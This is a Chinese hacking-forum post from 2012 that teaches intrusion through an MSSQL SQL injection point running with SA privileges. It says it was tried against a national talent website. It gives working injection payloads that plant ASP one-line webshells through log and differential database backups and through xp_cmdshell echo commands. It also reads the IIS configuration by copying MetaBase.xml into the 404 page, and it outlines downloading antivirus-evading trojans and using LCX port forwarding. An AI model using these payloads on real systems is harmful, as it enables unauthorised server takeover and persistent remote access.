找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2109|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
* P, B+ N3 h  q" X) t: \
8 `" z+ l/ m4 t" `
7 j; v6 X$ ^2 _5 h/ T                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
5 t' k4 D; Z0 M, f4 i: ?( f" e3 X# B( F8 i3 a- ^& h
                                                                 7 \" Q1 e" T. Y1 R$ B- ]# m
                                                                 " b, R. U6 H( `, K! w0 ?
                                                                  论坛: http://www.90team.net/: N0 ?0 r4 W4 q% \- `) W5 ^: X2 ^5 C
# N: q+ T0 |8 ]- }. o
( R6 J1 [! y- n1 T1 K5 J
/ A2 B" F0 w' Y( D* R6 S! _+ ~8 c: |
友情检测国家人才网$ m# k: N/ H' |' E! o% @: c" v

' [3 I8 q" a! Q! r" h
( N9 I! [! f5 m% f& h3 L内容:MSSQL注入SA权限不显错模式下的入侵
5 m" w' a9 Q* c" u7 q- X! y, W2 J0 z7 g# s: J

2 c: C/ l! k% h/ r( v7 x# e一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。! J9 P$ \7 \8 p% H: G

; c) O3 V3 q; Y. B我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。2 o. t6 q! e5 U# _5 u( S2 |
5 f7 ~% X4 @6 w; k) f! {# d
. l3 ~3 m7 F* F4 E
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。, ^3 _3 s# h; y/ w3 e
; q2 d# ?* t0 e- b2 S
思路:/ y! {- {+ }% t( ?6 ]2 Q- ]

( q2 B$ Q. {' S首先:, D5 Q+ X3 `* n
. B- _# P# w' H) y, M
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。5 `$ j  S- l+ j3 _: Q/ j5 D7 u

5 k, j# O+ b2 T* Z1.日志备份获得Webshell
6 S$ y1 f( G0 y6 A% L: o9 Z3 ~; N4 W  Q" H
2.数据库差异备份获得Webshell
" m: e0 Z* {( O( X* [2 q
- \$ H$ b" f( i9 [8 |4.直接下载免杀远控木马。
' Q: n; G* L9 a: O7 Y+ G0 f! Q# D& U# y! R0 ^
5.直接下载LCX将服务器端口转发出来
1 X! `6 n! `1 C  L% @# |
1 \0 {2 g4 G6 s, ]# G8 c$ W6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
' s2 T9 H7 u$ t, m# i! `
: P* w: _% O3 Q* y1 Y2 I; i8 d- w& h- c+ w  s7 }

) w+ @4 ?3 f6 d% {8 O在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
( b( A% X- ^) V0 ^5 X2 D6 o; Y, {. h3 Q& [$ ^% d2 B
我直接演示后面一个方法
/ X! f2 G4 s- f9 e
# ^' X, i, g) e0 j) ]  v; A& T+ d# f7 ~1 h$ t% S! d, x
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL 5 V8 q5 O$ F; q# z( @8 g
) i1 i! ]# G$ L6 o3 j2 q: W- ^

: b9 r% e& l% ^6 g( u$ _' j+ l, Z) s6 H# i" U& f5 l
2 I2 N( \% x! e8 b" e# A: q
◆日志备份:+ h6 C; g* P6 s2 ~. X4 ?! T3 }, p" V

( o7 [- s6 K7 ^" a" C9 K  ?
% p8 C- {6 A) |% r* j1. 进行初始备份
; @; Y" @9 }7 ?; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--* R6 j9 ^" V( y  j3 c2 A' }
- ^6 [/ f& Y' H" ~* q0 j( P$ N
2. 插入数据& F1 m. g% \4 r! v
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
) M3 H: m" D& o! @8 E
/ l' S( C8 o& }' ]; a  {+ M0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>3 C; {0 N/ \6 `, @6 B4 C8 F
  
- g5 x6 G: A9 }- E5 a; F3. 备份并获得文件,删除临时表
" j: @  H5 ~& _2 z/ |; n( ~;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--4 ^) z1 X3 C; s' ]* t) O5 H

. H) O: g+ Y% g% K4 b" G: n" f4 C. W3 [( P- h. _7 O

7 H6 t: ^. C7 R8 V% T! v' w8 h◆数据库差异备份* O; e1 _# g) }5 U3 }
) Z$ `' l: U, t8 W/ Z# i8 i
(1. 进行差异备份准备工作
, u& R2 C6 h, Z! D& B! ^% @
) G- u; j7 ?! R1 \% a;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--: ^( ^: |, n9 j3 g: h9 A

5 S2 f( M. E8 {% j, I) [# ]% d上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
0 `" Q: `  n5 k3 j' B
# l4 T$ @9 H7 `3 t1 Y% E$ y7 `+ a5 A" ^% V/ G1 i
(2. 将数据写入到数据库  I1 u; U3 t6 u* P. }, P
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
9 n' c2 Q# U) k/ `8 U$ ^: ^, E" x# l# c+ b+ G4 D9 D! }( X; {
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>& n" Z' L# a5 K# v; Y& `3 p4 H
2 I) j; g6 d, R8 x' x
3. 备份数据库并清理临时文件# j, \$ r8 Z$ Z* _  s& v
+ `" b3 B$ t% d" X
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--; [- F' D( u( u& I" N

! K+ A& e" o% ?1 j( E! z4 h, z. S0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
% s. Y; ^9 O$ ~8 r4 u3 ~
) ?+ K) ^1 t1 Z# r; X2 {/ P: `  [
+ T0 A& o; T( k- a% r& y7 n
用^转义字符来写ASP(一句话木马)文件的方法:   ) V+ y& K0 W: [
5 \! w, l8 |& R1 E  S
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--. \/ L% g* s# N8 \
' A5 [. c9 q) T. W8 m4 e
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
$ K  G! W: z8 |$ w/ J: n2 m$ C% |* k/ {* M. Y) ^
读取IIS配置信息获取web路径
" r) Q, D+ X' a8 l  W& N3 J/ r+ d/ b* \
     
# J" V' i& b* @% [* [& ~  Y     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--& b/ F; [; ]3 l
( X% B& F9 _, l% e. d  o$ r; H
执行命令
7 Z$ o; i3 p0 h# T9 P     # H0 X5 f3 U2 y* {) F/ M
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--, ^( i3 x/ l/ r" l! l) u) X& t

8 e0 g5 Z/ e- a+ }% _9 V" e  q! J" N  i) m' U7 C

9 j4 C( R, m7 f9 H% {
4 I( Z7 }9 W: s$ d" j
2 ]: n, `" s+ t  [: N* s0 ?2 n9 X2 }
* W) D7 _- N0 c. w/ X' v3 B* o
1 f7 X" J2 q. Y1 t  @( P! g

8 v/ |; i* V. H# D/ D, O1 N8 K& `+ g3 c* Z* F! y) U
. }6 B9 U3 j% Y6 ~' g* t- y
& f- Y! E/ v; ?' d1 \" _0 H

8 y% B3 f% _5 T5 _: F" a( V) g$ j' \' X* P
& B) x% g, d' _- x. [  P
* W7 Y7 i! I% W, Z+ f
) ^9 {0 n( a& j! c/ e3 D  m1 \0 L

: d$ W9 I- w: U" h; D5 j2 t2 Q( H; F6 l# R5 b1 P- [
( z" j+ {4 A3 T4 t7 F7 o& L

5 |" H/ s7 i6 ~: B* s( s: x4 P/ ^1 z: J. d2 I; t4 X0 C* x
( t4 V& m+ `/ O% m8 [. d: t, V

- ^; o+ n' V: q6 |" c) M% R6 V5 V; [1 H# p+ o
% t' q$ x0 x  q

+ }6 ]6 e, ^( a) ~2 |+ @4 K: [# p5 o' c

( Q9 J( {+ o* B( \7 M0 ~
" @# P2 f) d$ `* P, ^$ Q! o& U- A  ]# y

4 R# M! f2 @: ?0 @' k  B; S) v/ t% `
# x4 w4 s. K  G; I7 [# t& R
9 @4 F. E! n) |8 U& l
" f, r1 h: g( J' [- V/ D: R  m
$ w9 W- E# ?) k; W( q/ d5 H
* B6 }3 P. j  I. R2 j
; j1 _/ w$ W% z0 r7 f) I# ~; H
6 o* M  I. P0 l$ a+ y  E; q
! c5 |: G! n: G/ U! J" t. t* o3 T5 J: }" [8 n% q7 U2 V

  g0 V: y+ q, W' q, ^) _1 t" x( m
2 k9 A  g0 K; h8 A+ A5 G! t# g6 g4 j( J9 T, q# v5 C

* `4 Q/ J) [; h: E7 C- Y& E/ f8 P, {3 O$ q

9 K! i2 N2 T3 z$ s0 K+ e5 u# N7 v# K/ C" Z5 E! m/ d9 I/ i
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表